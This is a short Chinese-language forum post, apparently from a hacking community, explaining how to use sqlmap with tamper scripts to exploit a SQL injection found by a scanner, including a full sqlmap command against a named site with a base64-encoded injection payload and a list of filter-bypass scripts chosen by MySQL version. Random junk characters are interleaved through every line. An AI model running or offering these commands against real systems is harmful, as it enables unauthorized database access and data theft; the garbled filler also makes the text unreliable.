WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?4 j$ A% g/ _8 H k0 f8 v, A
8 t) a0 t. W8 v* z! Q0 j
sqlmap的tamper里有个base64encode.py
* Y& c& |8 F) |6 `: m. Q! _
& J5 |& V" [4 H# t% f) y6 Y( [9 _0 g6 T使用如下
+ x" }; q x. Y' v2 G2 n: C9 ]6 t) A, g* C" o+ K% y+ G5 d8 a
sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs! |3 m8 b1 m9 S8 ]) ~
4 w% ^# l" ^+ o* N6 G* d
) z0 y& s& k; ` a; h* Q' wsqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”) C; U# Z- Y9 C" Y! Y
8 `; j& t% p3 ?$ A$ p. W( }$ G
其中常用到的bypass脚本绕过SQLMAP主要两个脚本:
5 b v+ y! q8 H$ B( S; c. u& ^8 e, X0 X2 q: \$ Q9 w
space2hash.py ,对于MYSQL数据库 4.0, 5.0注入
& m; w5 A! g }2 P _ }5 O7 Y) jspace2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入+ f7 \+ R, X/ k/ ^( _6 q
首先确定目标数据库版本,然后选择相应的脚本。
( x# X2 H9 [7 G) W& \9 y J-v 3 --batch --tamper "space2hash.py"8 A N, t2 A. X- D
: [) O3 K, ]) N, U9 r9 K还有其他一些插件:
, C4 D0 W9 k, ^! \# iencodes编码 ——charencode.py
c# i0 x1 [( a/ |$ ^( c& l4 l) _base64编码 —— base64encode.py
2 M3 I0 I% z/ E9 D; ` h* d替换空格和关键字 —— halfversionedmorekeywords.py: d9 q* |: |; K2 ~ r+ a5 v
|
9 X: T6 {1 {' t2 `# c" }8 u* y; \# _5 E/ [8 f1 A8 x
0 s! s6 T/ H p; R, i1 J" I9 i2 r" A: _2 b7 y7 h1 M4 J5 p
|